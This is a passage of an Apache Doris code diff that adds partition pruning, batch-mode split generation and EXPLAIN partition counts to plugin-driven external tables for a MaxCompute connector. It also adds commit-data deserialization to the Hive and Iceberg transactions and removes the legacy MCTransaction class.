org.apache.doris.connector.api.ConnectorColumn; import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorPartitionInfo; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.ConnectorTableSchema; import org.apache.doris.connector.api.ConnectorTableStatistics; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.datasource.mvcc.MvccSnapshot; import org.apache.doris.statistics.AnalysisInfo; import org.apache.doris.statistics.BaseAnalysisTask; import org.apache.doris.statistics.ExternalAnalysisTask; import org.apache.doris.thrift.TTableDescriptor; import org.apache.doris.thrift.TTableType; +import com.google.common.collect.Maps; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.io.IOException; import java.util.ArrayList; +import java.util.Collections; import java.util.List; +import java.util.Map; +import java.util.Map.Entry; import java.util.Optional; +import java.util.stream.Collectors; /** * Generic {@link ExternalTable} for plugin-driven catalogs. @@ -76,6 +85,36 @@ public boolean supportsParallelWrite() { && connector.getCapabilities().contains(ConnectorCapability.SUPPORTS_PARALLEL_WRITE); } + /** + * Returns whether the underlying connector requires dynamic-partition writes to be + * hash-distributed by partition columns and locally sorted by them (e.g. MaxCompute Storage + * API). Used by {@code PhysicalConnectorTableSink} to require that distribution + sort for + * dynamic-partition writes; defaults to false so non-partitioned connectors are unaffected. + */ + public boolean requirePartitionLocalSortOnWrite() { + if (!(catalog instanceof PluginDrivenExternalCatalog)) { + return false; + } + Connector connector = ((PluginDrivenExternalCatalog) catalog).getConnector(); + return connector != null + && connector.getCapabilities().contains(ConnectorCapability.SINK_REQUIRE_PARTITION_LOCAL_SORT); + } + + /** + * Returns whether the underlying connector maps write data columns positionally against the full + * table schema (e.g. MaxCompute), requiring the sink to project rows to full-schema order with + * unmentioned columns filled. Name-mapped connectors (e.g. JDBC) return false and keep their data + * in user/cols order. Used by {@code BindSink.bindConnectorTableSink}; defaults to false. + */ + public boolean requiresFullSchemaWriteOrder() { + if (!(catalog instanceof PluginDrivenExternalCatalog)) { + return false; + } + Connector connector = ((PluginDrivenExternalCatalog) catalog).getConnector(); + return connector != null + && connector.getCapabilities().contains(ConnectorCapability.SINK_REQUIRE_FULL_SCHEMA_ORDER); + } + @Override public boolean supportsExternalMetadataPreload() { if (!(catalog instanceof PluginDrivenExternalCatalog)) { @@ -130,7 +169,35 @@ public Optional initSchema() { } List columns = ConnectorColumnConverter.convertColumns(mappedColumns); - return Optional.of(new SchemaCacheValue(columns)); + + // Identify partition columns from the connector's "partition_columns" property (a CSV of + // RAW remote column names; producer: MaxComputeConnectorMetadata). We keep two aligned + // views: the Doris Columns (with mapped/local names, used for getPartitionColumns + types) + // and the raw remote names (used to index the raw-keyed partition-value maps from the SPI). + // The columns themselves are already present in `columns` (the connector appends partition + // columns to the schema, mirroring legacy); here we only mark which ones are partitions. + List partitionColumns = new ArrayList<>(); + List partitionColumnRemoteNames = new ArrayList<>(); + String partColsProp = tableSchema.getProperties().get("partition_columns"); + if (partColsProp != null && !partColsProp.isEmpty()) { + Map byName = Maps.newHashMapWithExpectedSize(columns.size()); + for (Column c : columns) { + byName.putIfAbsent(c.getName(), c); + } + for (String rawName : partColsProp.split(",")) { + rawName = rawName.trim(); + if (rawName.isEmpty()) { + continue; + } + String mappedName = metadata.fromRemoteColumnName(session, dbName, tableName, rawName); + Column col = byName.get(mappedName); + if (col != null) { + partitionColumns.add(col); + partitionColumnRemoteNames.add(rawName); + } + } + } + return Optional.of(new PluginDrivenSchemaCacheValue(columns, partitionColumns, partitionColumnRemoteNames)); } @Override @@ -141,6 +208,93 @@ protected synchronized void makeSureInitialized() { } } + @Override + public boolean isPartitionedTable() { + makeSureInitialized(); + return !getPartitionColumns().isEmpty(); + } + + @Override + public List getPartitionColumns(Optional snapshot) { + return getPartitionColumns(); + } + + public List getPartitionColumns() { + makeSureInitialized(); + return getSchemaCacheValue() + .map(value -> ((PluginDrivenSchemaCacheValue) value).getPartitionColumns()) + .orElse(Collections.emptyList()); + } + + @Override + public boolean supportInternalPartitionPruned() { + // Unconditional true, mirroring legacy MaxComputeExternalTable (and IcebergExternalTable). + // This override is shared by every SPI-driven connector (jdbc/es/trino/max_compute via + // CatalogFactory.SPI_READY_TYPES) and true is correct for all of them, partitioned or not: + // - partitioned -> PruneFileScanPartition prunes to the surviving partitions; + // - non-partitioned -> PruneFileScanPartition takes its IF branch and pruneExternalPartitions + // returns NOT_PRUNED for empty partition columns, so the scan reads all. + // It must NOT be gated on `!getPartitionColumns().isEmpty()`: returning false for a + // non-partitioned table sends PruneFileScanPartition down its ELSE branch, which overwrites the + // selection with SelectedPartitions(0, {}, isPruned=true). PluginDrivenScanNode.getSplits() then + // reads that as "pruned to zero partitions" and short-circuits to no splits, so a filtered query + // over a non-partitioned table silently returns zero rows (data loss). See FIX-NONPART-PRUNE-DATALOSS. + return true; + } + + @Override + public Map getNameToPartitionItems(Optional snapshot) { + List partitionColumns = getPartitionColumns(); + if (partitionColumns.isEmpty()) { + return Collections.emptyMap(); + } + List remoteNames = getSchemaCacheValue() + .map(value -> ((PluginDrivenSchemaCacheValue) value).getPartitionColumnRemoteNames()) + .orElse(Collections.emptyList()); + List types = partitionColumns.stream().map(Column::getType).collect(Collectors.toList()); + + PluginDrivenExternalCatalog pluginCatalog = (PluginDrivenExternalCatalog) catalog; + Connector connector = pluginCatalog.getConnector(); + ConnectorSession session = pluginCatalog.buildConnectorSession(); + ConnectorMetadata metadata = connector.getMetadata(session); + String dbName = db != null ? db.getRemoteName() : ""; + Optional handleOpt = metadata.getTableHandle(session, dbName, getRemoteName()); + if (!handleOpt.isPresent()) { + return Collections.emptyMap(); + } + + // One round-trip, no FE-side partition-value cache (per CACHE-P1: the cutover lists + // partitions per query instead of maintaining a second-level cache). The connector returns + // each partition's display name plus a raw-keyed value map; we extract values in + // partition-column order via the cached remote names. + List partitions = + metadata.listPartitions(session, handleOpt.get(), Optional.empty()); + List partitionNames = new ArrayList<>(partitions.size()); + List> partitionValues = new ArrayList<>(partitions.size()); + for (ConnectorPartitionInfo partition : partitions) { + partitionNames.add(partition.getPartitionName()); + List values = new ArrayList<>(remoteNames.size()); + for (String remoteName : remoteNames) { + values.add(partition.getPartitionValues().get(remoteName)); + } + partitionValues.add(values); + } + + // Reuse TablePartitionValues so the PartitionItem construction (ListPartitionItem, + // isHive=false) is identical to legacy MaxComputeExternalMetaCache.loadPartitionValues, + // then invert id->item via id->name (mirroring MaxComputeExternalTable.getNameToPartitionItems). + TablePartitionValues tablePartitionValues = new TablePartitionValues(); + tablePartitionValues.addPartitions(partitionNames, partitionValues, types, + Collections.nCopies(partitionNames.size(), 0L)); + Map idToPartitionItem = tablePartitionValues.getIdToPartitionItem(); + Map idToNameMap = tablePartitionValues.getPartitionIdToNameMap(); + Map nameToPartitionItem = Maps.newHashMapWithExpectedSize(idToPartitionItem.size()); + for (Entry entry : idToPartitionItem.entrySet()) { + nameToPartitionItem.put(idToNameMap.get(entry.getKey()), entry.getValue()); + } + return nameToPartitionItem; + } + @Override public long getCachedRowCount() { // Do NOT call makeSureInitialized() here. @@ -234,6 +388,10 @@ public String getEngine() { // TableType.TRINO_CONNECTOR_EXTERNAL_TABLE.toEngineName() returns null // (no switch case in TableType.toEngineName), matching legacy behavior. return TableType.TRINO_CONNECTOR_EXTERNAL_TABLE.toEngineName(); + case "max_compute": + // TableType.MAX_COMPUTE_EXTERNAL_TABLE.toEngineName() returns null + // (no switch case in TableType.toEngineName), matching legacy behavior. + return TableType.MAX_COMPUTE_EXTERNAL_TABLE.toEngineName(); default: return super.getEngine(); } @@ -250,6 +408,8 @@ public String getEngineTableTypeName() { return TableType.ES_EXTERNAL_TABLE.name(); case "trino-connector": return TableType.TRINO_CONNECTOR_EXTERNAL_TABLE.name(); + case "max_compute": + return TableType.MAX_COMPUTE_EXTERNAL_TABLE.name(); default: return TableType.PLUGIN_EXTERNAL_TABLE.name(); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java index d0875e6f32bf90..41315afe87fabb 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java @@ -22,6 +22,7 @@ import org.apache.doris.analysis.ExprToSqlVisitor; import org.apache.doris.analysis.ToSqlParams; import org.apache.doris.analysis.TupleDescriptor; +import org.apache.doris.catalog.Env; import org.apache.doris.catalog.TableIf; import org.apache.doris.common.UserException; import org.apache.doris.connector.api.Connector; @@ -38,6 +39,7 @@ import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.api.scan.ConnectorScanRange; import org.apache.doris.connector.api.scan.ScanNodePropertiesResult; +import org.apache.doris.nereids.trees.plans.logical.LogicalFileScan.SelectedPartitions; import org.apache.doris.planner.PlanNodeId; import org.apache.doris.planner.ScanContext; import org.apache.doris.qe.SessionVariable; @@ -61,6 +63,10 @@ import java.util.Map; import java.util.Optional; import java.util.Set; +import java.util.concurrent.CompletableFuture; +import java.util.concurrent.Executor; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.concurrent.atomic.AtomicReference; import java.util.stream.Collectors; /** @@ -100,6 +106,15 @@ public class PluginDrivenScanNode extends FileQueryScanNode { // Set during filter pushdown; may be updated from the original table handle. private ConnectorTableHandle currentHandle; + // Nereids partition-pruning result, injected by the translator. Defaults to NOT_PRUNED + // so that connectors / non-partitioned tables read all partitions unless pruning applies. + private SelectedPartitions selectedPartitions = SelectedPartitions.NOT_PRUNED; + + // Cached isBatchMode() result. isBatchMode is read on both the dispatch (FileQueryScanNode) + // and explain (FileScanNode) paths and num_partitions_in_batch_mode is fuzzy, so cache it to + // keep the decision stable across reads (mirrors IcebergScanNode). + private Boolean isBatchModeCache; + // Populated from ConnectorScanPlanProvider.getScanNodePropertiesResult() private ScanNodePropertiesResult cachedPropertiesResult; private Map scanNodeProperties; @@ -136,6 +151,57 @@ public static PluginDrivenScanNode create(PlanNodeId id, TupleDescriptor desc, scanContext, connector, session, handle); } + /** + * Injects the Nereids partition-pruning result. Called by the translator so the pruned + * partition set can be pushed down to the connector's scan plan (see {@link #getSplits}). + */ + public void setSelectedPartitions(SelectedPartitions selectedPartitions) { + this.selectedPartitions = selectedPartitions; + } + + /** + * Resolves the pruned partition spec strings to push to the connector SPI. + * + *

Mirrors legacy {@code MaxComputeScanNode.getSplits()} three-state handling:

+ *
    + *
  • not pruned (NOT_PRUNED / non-partitioned) → {@code null}: scan all partitions;
  • + *
  • pruned to a non-empty set → that set's partition names;
  • + *
  • pruned to zero partitions → empty list: caller short-circuits with no splits.
  • + *
+ */ + static List resolveRequiredPartitions(SelectedPartitions selectedPartitions) { + if (selectedPartitions == null || !selectedPartitions.isPruned) { + return null; + } + return new ArrayList<>(selectedPartitions.selectedPartitions.keySet()); + } + + /** + * Partition counts to surface on this scan node — {@code {selectedPartitionNum, totalPartitionNum}} + * — or {@code null} to leave the fields at their default (nothing to show). Drives the EXPLAIN + * {@code partition=N/M} line and SQL-block-rule enforcement (via {@code getSelectedPartitionNum()}). + * + *

Mirrors legacy {@code MaxComputeScanNode}'s display gate: any real partition selection + * reports {@code size/total}, whereas the {@link SelectedPartitions#NOT_PRUNED} sentinel + * (non-partitioned table, or one not supporting internal pruning) reports nothing.

+ * + *

The gate is {@code != NOT_PRUNED}, deliberately not {@code isPruned}: a partitioned table + * queried without a partition predicate keeps the initial all-partitions selection from + * {@link ExternalTable#initSelectedPartitions} ({@code isPruned=false} but a full, non-{@code + * NOT_PRUNED} map; {@code PruneFileScanPartition} only runs under a {@code LogicalFilter}), and must + * still report {@code partition=total/total} (e.g. {@code SELECT *} over a 2-partition table → + * {@code 2/2}). An {@code isPruned} gate wrongly shows {@code 0/0}. This differs from the connector + * pushdown gate ({@link #resolveRequiredPartitions}, which stays {@code isPruned}): an unpruned scan + * must read ALL partitions, so it pushes no partition restriction.

+ */ + static long[] displayPartitionCounts(SelectedPartitions selectedPartitions) { + if (selectedPartitions == null || selectedPartitions == SelectedPartitions.NOT_PRUNED) { + return null; + } + return new long[] { + selectedPartitions.selectedPartitions.size(), selectedPartitions.totalPartitionNum}; + } + @Override public String getNodeExplainString(String prefix, TExplainLevel detailLevel) { StringBuilder output = new StringBuilder(); @@ -148,6 +214,11 @@ public String getNodeExplainString(String prefix, TExplainLevel detailLevel) { String query = props.get("query"); output.append(prefix).append("TABLE: ") .append(desc.getTable().getNameWithFullQualifiers()).append("\n"); + // Surface the backing connector/catalog type (e.g. es, jdbc, max_compute) so the + // generic node name does not hide which connector this scan delegates to. Reuses the + // same getDatabase().getCatalog() chain getNameWithFullQualifiers() already walks here. + output.append(prefix).append("CONNECTOR: ") + .append(desc.getTable().getDatabase().getCatalog().getType()).append("\n"); if (query != null) { output.append(prefix).append("QUERY: ").append(query).append("\n"); } @@ -157,6 +228,13 @@ public String getNodeExplainString(String prefix, TExplainLevel detailLevel) { .append(expr.accept(ExprToSqlVisitor.INSTANCE, ToSqlParams.WITH_TABLE)) .append("\n"); } + // Partition-pruning summary (selected/total), mirroring the parent + // FileScanNode.getNodeExplainString()'s `partition=N/M` line. This override replaces the + // parent's body wholesale (custom TABLE/QUERY/PREDICATES format), so it must re-emit the + // line itself; the counts are populated from the Nereids pruning result in + // getSplits()/startSplit() (see setSelectedPartitions). + output.append(prefix).append("partition=").append(selectedPartitionNum) + .append("/").append(totalPartitionNum).append("\n"); // Delegate connector-specific EXPLAIN info to the SPI ConnectorScanPlanProvider scanProvider = connector.getScanPlanProvider(); if (scanProvider != null) { @@ -363,12 +441,38 @@ public List getSplits(int numBackends) throws UserException { return Collections.emptyList(); } + // Push the Nereids partition-pruning result down to the connector so the read session + // covers only the surviving partitions. A pruned-to-zero set means no data to read, + // mirroring legacy MaxComputeScanNode.getSplits()'s empty-selection short-circuit. + List requiredPartitions = resolveRequiredPartitions(selectedPartitions); + // Surface the partition counts for EXPLAIN (partition=N/M) and SQL-block-rule enforcement, + // mirroring legacy MaxComputeScanNode.getSplits():720-722. Set BEFORE the pruned-to-zero + // short-circuit below so a 0-partition selection still reports partition=0/total (e.g. WHERE + // part=). Batch mode populates these in startSplit() instead. See + // displayPartitionCounts for why the gate covers the no-predicate all-partitions case. + long[] partitionCounts = displayPartitionCounts(selectedPartitions); + if (partitionCounts != null) { + this.selectedPartitionNum = partitionCounts[0]; + this.totalPartitionNum = partitionCounts[1]; + } + if (requiredPartitions != null && requiredPartitions.isEmpty()) { + return Collections.emptyList(); + } + List columns = buildColumnHandles(); tryPushDownProjection(columns); Optional remainingFilter = buildRemainingFilter(); + // If buildRemainingFilter stripped non-pushable (CAST) conjuncts (filteredToOriginalIndex + // != null), suppress source-side LIMIT pushdown: the connector now sees a filter that no + // longer reflects those predicates and could apply a LIMIT (e.g. MaxCompute's row-offset + // limit-split optimization, which fires on an empty/partition-only filter) over rows the + // stripped predicate has NOT filtered. Since BE re-evaluates the stripped predicate only on + // the rows the source returns, that would under-return. Legacy disabled limit-split whenever + // a non-partition-equality (incl. CAST) predicate was present; this mirrors it. + long sourceLimit = effectiveSourceLimit(limit, filteredToOriginalIndex != null); List ranges = scanProvider.planScan( - connectorSession, currentHandle, columns, remainingFilter, limit); + connectorSession, currentHandle, columns, remainingFilter, sourceLimit, requiredPartitions); List splits = new ArrayList<>(ranges.size()); for (ConnectorScanRange range : ranges) { @@ -377,6 +481,163 @@ public List getSplits(int numBackends) throws UserException { return splits; } + /** + * Source-side LIMIT to pass to {@code planScan}: the real limit normally, but {@code -1} + * (no source limit) when non-pushable conjuncts were stripped from the filter. A source LIMIT + * applied before a stripped (BE-only) predicate would return too few rows (BE can only filter + * the returned rows down, not recover rows the source never returned). Extracted as a pure + * static so the correctness-critical decision is unit-testable without a {@link FileQueryScanNode}. + */ + static long effectiveSourceLimit(long limit, boolean nonPushableConjunctsStripped) { + return nonPushableConjunctsStripped ? -1L : limit; + } + + /** + * Enables batched / streaming split generation for large partitioned scans, mirroring legacy + * {@code MaxComputeScanNode.isBatchMode()}. Three gates are evaluated generically from state the + * node already holds (partition pruning + slots + the {@code num_partitions_in_batch_mode} + * threshold); the connector-specific gate (legacy {@code odpsTable.getFileNum() > 0}) is + * delegated to {@link ConnectorScanPlanProvider#supportsBatchScan}. + */ + @Override + public boolean isBatchMode() { + if (isBatchModeCache == null) { + isBatchModeCache = computeBatchMode(); + } + return isBatchModeCache; + } + + private boolean computeBatchMode() { + // getScanPlanProvider() may be null for connectors without scan capability; mirror the + // null-guard in getSplits() so isBatchMode (run on the dispatch + explain paths) never NPEs. + ConnectorScanPlanProvider scanProvider = connector.getScanPlanProvider(); + boolean supportsBatchScan = scanProvider != null + && scanProvider.supportsBatchScan(connectorSession, currentHandle); + return shouldUseBatchMode(selectedPartitions, !desc.getSlots().isEmpty(), + supportsBatchScan, sessionVariable.getNumPartitionsInBatchMode()); + } + + /** + * Pure batch-mode gate, mirroring legacy {@code MaxComputeScanNode.isBatchMode()} (its connector + * {@code odpsTable.getFileNum() > 0} check is folded into {@code supportsBatchScan}). Extracted + * as a static helper so the four-input decision is unit-testable without constructing a + * {@link FileQueryScanNode} (the async/wiring half is covered by live e2e — see DV-019). + * + *
    + *
  • not partitioned / not pruned ({@code selectedPartitions} null or {@code !isPruned}) → false;
  • + *
  • no required slots → false;
  • + *
  • connector does not support batch scan (incl. no scan provider) → false;
  • + *
  • otherwise batch iff {@code numPartitionsInBatchMode > 0} and the pruned partition count + * reaches that threshold.
  • + *
+ * + *

The {@code !isPruned} check subsumes BOTH legacy gates ({@code getPartitionColumns().isEmpty()} + * and the reference check {@code != NOT_PRUNED}): a non-partitioned external table always carries + * {@code NOT_PRUNED} (which has {@code isPruned=false}), so collapsing them is not a dropped gate — + * it is in fact marginally stronger than legacy's reference identity check.

+ */ + static boolean shouldUseBatchMode(SelectedPartitions selectedPartitions, boolean hasSlots, + boolean supportsBatchScan, int numPartitionsInBatchMode) { + if (selectedPartitions == null || !selectedPartitions.isPruned) { + return false; + } + if (!hasSlots) { + return false; + } + if (!supportsBatchScan) { + return false; + } + return numPartitionsInBatchMode > 0 + && selectedPartitions.selectedPartitions.size() >= numPartitionsInBatchMode; + } + + @Override + public int numApproximateSplits() { + // Number of pruned partitions; must be non-negative in batch mode (FileQueryScanNode rejects + // negative). Under the isBatchMode gate this is >= num_partitions_in_batch_mode >= 1. + return selectedPartitions == null ? -1 : selectedPartitions.selectedPartitions.size(); + } + + /** + * Asynchronously generates splits in batches of {@code num_partitions_in_batch_mode} partitions, + * streaming each batch into {@link #splitAssignment}. Mirrors legacy + * {@code MaxComputeScanNode.startSplit}: one read session per partition batch (built by the + * connector via {@link ConnectorScanPlanProvider#planScanForPartitionBatch}) on the shared + * schedule executor, with the same completion/error protocol against {@code SplitAssignment}. + * + *

Batch mode deliberately does NOT push the limit (passes {@code -1}): legacy's batch path + * ignores limit, and the LIMIT-split optimization stays on the non-batch {@link #getSplits} + * path only (the two are mutually exclusive).

+ */ + @Override + public void startSplit(int numBackends) { + long[] partitionCounts = displayPartitionCounts(selectedPartitions); + if (partitionCounts != null) { + this.selectedPartitionNum = partitionCounts[0]; + this.totalPartitionNum = partitionCounts[1]; + } + if (selectedPartitions.selectedPartitions.isEmpty()) { + // Unreachable under the isBatchMode gate (size >= num_partitions_in_batch_mode >= 1); + // kept for fidelity with legacy MaxComputeScanNode.startSplit's empty short-circuit. + return; + } + + // Mirror getSplits()'s projection + filter pushdown (but NOT the limit) before going async. + // tryPushDownProjection mutates currentHandle, so capture the resolved handle afterwards. + final List columns = buildColumnHandles(); + tryPushDownProjection(columns); + final Optional remainingFilter = buildRemainingFilter(); + final ConnectorTableHandle handle = currentHandle; + final ConnectorScanPlanProvider scanProvider = connector.getScanPlanProvider(); + final List allPartitions = + new ArrayList<>(selectedPartitions.selectedPartitions.keySet()); + final int batchSize = sessionVariable.getNumPartitionsInBatchMode(); + + Executor scheduleExecutor = Env.getCurrentEnv().getExtMetaCacheMgr().getScheduleExecutor(); + AtomicReference batchException = new AtomicReference<>(null); + AtomicInteger numFinishedPartitions = new AtomicInteger(0); + + CompletableFuture.runAsync(() -> { + for (int begin = 0; begin < allPartitions.size(); begin += batchSize) { + int end = Math.min(begin + batchSize, allPartitions.size()); + if (batchException.get() != null || splitAssignment.isStop()) { + break; + } + List batch = allPartitions.subList(begin, end); + int curBatchSize = end - begin; + try { + CompletableFuture.runAsync(() -> { + try { + List ranges = scanProvider.planScanForPartitionBatch( + connectorSession, handle, columns, remainingFilter, -1L, batch); + List batchSplits = new ArrayList<>(ranges.size()); + for (ConnectorScanRange range : ranges) { + batchSplits.add(new PluginDrivenSplit(range)); + } + if (splitAssignment.needMoreSplit()) { + splitAssignment.addToQueue(batchSplits); + } + } catch (Exception e) { + batchException.set(new UserException(e.getMessage(), e)); + } finally { + if (batchException.get() != null) { + splitAssignment.setException(batchException.get()); + } + if (numFinishedPartitions.addAndGet(curBatchSize) == allPartitions.size()) { + splitAssignment.finishSchedule(); + } + } + }, scheduleExecutor); + } catch (Exception e) { + batchException.set(new UserException(e.getMessage(), e)); + } + if (batchException.get() != null) { + splitAssignment.setException(batchException.get()); + } + } + }, scheduleExecutor); + } + @Override protected void setScanParams(TFileRangeDesc rangeDesc, Split split) { if (!(split instanceof PluginDrivenSplit)) { diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSchemaCacheValue.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSchemaCacheValue.java new file mode 100644 index 00000000000000..41f16f5c9a9494 --- /dev/null +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSchemaCacheValue.java @@ -0,0 +1,64 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.Column; + +import java.util.List; + +/** + * {@link SchemaCacheValue} for plugin-driven external tables. + * + *

In addition to the full schema, it caches which columns are partition + * columns so that {@link PluginDrivenExternalTable#getPartitionColumns()}, + * {@link PluginDrivenExternalTable#isPartitionedTable()} and partition pruning + * can be served from the schema cache (mirroring {@code MaxComputeSchemaCacheValue} + * / {@code HMSSchemaCacheValue}) instead of re-fetching the table schema from the + * connector on every call.

+ * + *

Two views of the partition columns are kept: + *

    + *
  • {@code partitionColumns} — the Doris {@link Column}s (with the local, + * identifier-mapped names) used by {@code getPartitionColumns()} and to derive + * partition-column types.
  • + *
  • {@code partitionColumnRemoteNames} — the raw remote (e.g. ODPS) partition + * column names, aligned by index with {@code partitionColumns}, used to index + * the raw-keyed partition-value maps returned by the connector SPI + * ({@code ConnectorPartitionInfo.getPartitionValues()}).
  • + *
+ */ +public class PluginDrivenSchemaCacheValue extends SchemaCacheValue { + + private final List partitionColumns; + private final List partitionColumnRemoteNames; + + public PluginDrivenSchemaCacheValue(List schema, List partitionColumns, + List partitionColumnRemoteNames) { + super(schema); + this.partitionColumns = partitionColumns; + this.partitionColumnRemoteNames = partitionColumnRemoteNames; + } + + public List getPartitionColumns() { + return partitionColumns; + } + + public List getPartitionColumnRemoteNames() { + return partitionColumnRemoteNames; + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/hive/HMSTransaction.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/hive/HMSTransaction.java index 0e2bd1d531c604..ade64834583bde 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/hive/HMSTransaction.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/hive/HMSTransaction.java @@ -59,6 +59,9 @@ import org.apache.hadoop.hive.metastore.api.Table; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; +import org.apache.thrift.TDeserializer; +import org.apache.thrift.TException; +import org.apache.thrift.protocol.TBinaryProtocol; import java.net.URI; import java.util.ArrayList; @@ -385,11 +388,23 @@ public void updateHivePartitionUpdates(List pus) { } } + @Override + public void addCommitData(byte[] commitFragment) { + THivePartitionUpdate pu = new THivePartitionUpdate(); + try { + new TDeserializer(new TBinaryProtocol.Factory()).deserialize(pu, commitFragment); + } catch (TException e) { + throw new RuntimeException("failed to deserialize Hive partition update", e); + } + updateHivePartitionUpdates(Collections.singletonList(pu)); + } + // for test public void setHivePartitionUpdates(List hivePartitionUpdates) { this.hivePartitionUpdates = hivePartitionUpdates; } + @Override public long getUpdateCnt() { return hivePartitionUpdates.stream().mapToLong(THivePartitionUpdate::getRowCount).sum(); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/iceberg/IcebergTransaction.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/iceberg/IcebergTransaction.java index 1325df321c37ee..640ec1b9ff7233 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/iceberg/IcebergTransaction.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/iceberg/IcebergTransaction.java @@ -55,6 +55,9 @@ import org.apache.iceberg.util.ContentFileUtil; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; +import org.apache.thrift.TDeserializer; +import org.apache.thrift.TException; +import org.apache.thrift.protocol.TBinaryProtocol; import java.io.IOException; import java.util.ArrayList; @@ -100,6 +103,17 @@ public void updateIcebergCommitData(List commitDataList) { } } + @Override + public void addCommitData(byte[] commitFragment) { + TIcebergCommitData data = new TIcebergCommitData(); + try { + new TDeserializer(new TBinaryProtocol.Factory()).deserialize(data, commitFragment); + } catch (TException e) { + throw new RuntimeException("failed to deserialize Iceberg commit data", e); + } + updateIcebergCommitData(Collections.singletonList(data)); + } + public void setConflictDetectionFilter(Expression filter) { conflictDetectionFilter = Optional.ofNullable(filter); } @@ -559,6 +573,7 @@ public void rollback() { // For insert mode, do nothing as original implementation } + @Override public long getUpdateCnt() { long dataRows = 0; long deleteRows = 0; diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java deleted file mode 100644 index 6d5a6c9112f940..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java +++ /dev/null @@ -1,240 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - -import org.apache.doris.common.Config; -import org.apache.doris.common.UserException; -import org.apache.doris.datasource.ExternalTable; -import org.apache.doris.nereids.trees.plans.commands.insert.InsertCommandContext; -import org.apache.doris.nereids.trees.plans.commands.insert.MCInsertCommandContext; -import org.apache.doris.thrift.TMCCommitData; -import org.apache.doris.transaction.Transaction; - -import com.aliyun.odps.PartitionSpec; -import com.aliyun.odps.table.TableIdentifier; -import com.aliyun.odps.table.configuration.ArrowOptions; -import com.aliyun.odps.table.configuration.ArrowOptions.TimestampUnit; -import com.aliyun.odps.table.configuration.DynamicPartitionOptions; -import com.aliyun.odps.table.write.TableBatchWriteSession; -import com.aliyun.odps.table.write.TableWriteSessionBuilder; -import com.aliyun.odps.table.write.WriterCommitMessage; -import com.google.common.collect.Lists; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.io.ByteArrayInputStream; -import java.io.ObjectInputStream; -import java.util.ArrayList; -import java.util.Base64; -import java.util.List; -import java.util.Map; -import java.util.Optional; -import java.util.concurrent.atomic.AtomicLong; -import java.util.stream.Collectors; - -public class MCTransaction implements Transaction { - - private static final Logger LOG = LogManager.getLogger(MCTransaction.class); - - private final MaxComputeExternalCatalog catalog; - private MaxComputeExternalTable table; - private final List commitDataList = Lists.newArrayList(); - - // Storage API write session ID (created in beginInsert, used in finishInsert) - private String writeSessionId; - private final AtomicLong nextBlockId = new AtomicLong(0); - - public MCTransaction(MaxComputeExternalCatalog catalog) { - this.catalog = catalog; - } - - public void updateMCCommitData(List commitDataList) { - synchronized (this) { - this.commitDataList.addAll(commitDataList); - } - } - - public void beginInsert(ExternalTable dorisTable, Optional ctx) throws UserException { - this.table = (MaxComputeExternalTable) dorisTable; - if (table.isUnsupportedOdpsTable()) { - throw new UserException("Writing MaxCompute external table or logical view is not supported: " - + table.getDbName() + "." + table.getName()); - } - - try { - TableIdentifier tableId = catalog.getOdpsTableIdentifier(table.getDbName(), table.getName()); - - boolean isDynamicPartition = !table.getPartitionColumns().isEmpty(); - boolean isStaticPartition = false; - String staticPartitionSpecStr = null; - - boolean isOverwrite = false; - if (ctx.isPresent() && ctx.get() instanceof MCInsertCommandContext) { - MCInsertCommandContext mcCtx = (MCInsertCommandContext) ctx.get(); - Map staticSpec = mcCtx.getStaticPartitionSpec(); - if (staticSpec != null && !staticSpec.isEmpty()) { - isStaticPartition = true; - // Must 